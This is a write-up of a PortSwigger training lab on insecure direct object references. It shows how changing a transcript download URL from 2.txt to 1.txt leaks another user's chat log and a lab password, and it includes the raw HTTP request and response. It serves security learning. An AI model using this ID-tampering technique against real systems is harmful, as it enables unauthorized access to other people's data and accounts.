Skip to content

Insecure direct object references

Introduction

Portswigger

Category: Access control vulnerabilities

Write-up date: 10/06/2025

Question: This lab stores user chat logs directly on the server's file system, and retrieves them using static URLs.

Solve the lab by finding the password for the user carlos, and logging into their account.

Point: APPRENTICE

Recon

At the man website has a function live chat that user can use to contact administrator.

You can chat and send or click download transcript.

When click download the browser try to download transcript 2.txt. Change that to url 1.txt, the server return us the transcript without authorize.

Exploit

In normal website, we can only access item that we own but some time when logic bug happened we can download other. In this lab is a example of that, or in other word "Insecure direct object references"

Change the download to download transcript 1.txt

GET /download-transcript/1.txt HTTP/2
Host: 0a7600420343aa73812e9869005900bb.web-security-academy.net
Cookie: session=redacted
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://0a7600420343aa73812e9869005900bb.web-security-academy.net/chat
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

And the website return us a chat with Hal Pline, where he and another people ask about something and accidentally reveal his password.

HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Disposition: attachment; filename="1.txt"
X-Frame-Options: SAMEORIGIN
Content-Length: 520

CONNECTED: -- Now chatting with Hal Pline --
You: Hi Hal, I think I've forgotten my password and need confirmation that I've got the right one
Hal Pline: Sure, no problem, you seem like a nice guy. Just tell me your password and I'll confirm whether it's correct or not.
You: Wow you're so nice, thanks. I've heard from other people that you can be a right ****
Hal Pline: Takes one to know one
You: Ok so my password is irc8ffhcqhl56bkwzj26. Is that right?
Hal Pline: Yes it is!
You: Ok thanks, bye!
Hal Pline: Do one!

fetch_transcript.png

Using that password to login into carlos account and we complete the lab.

solved.png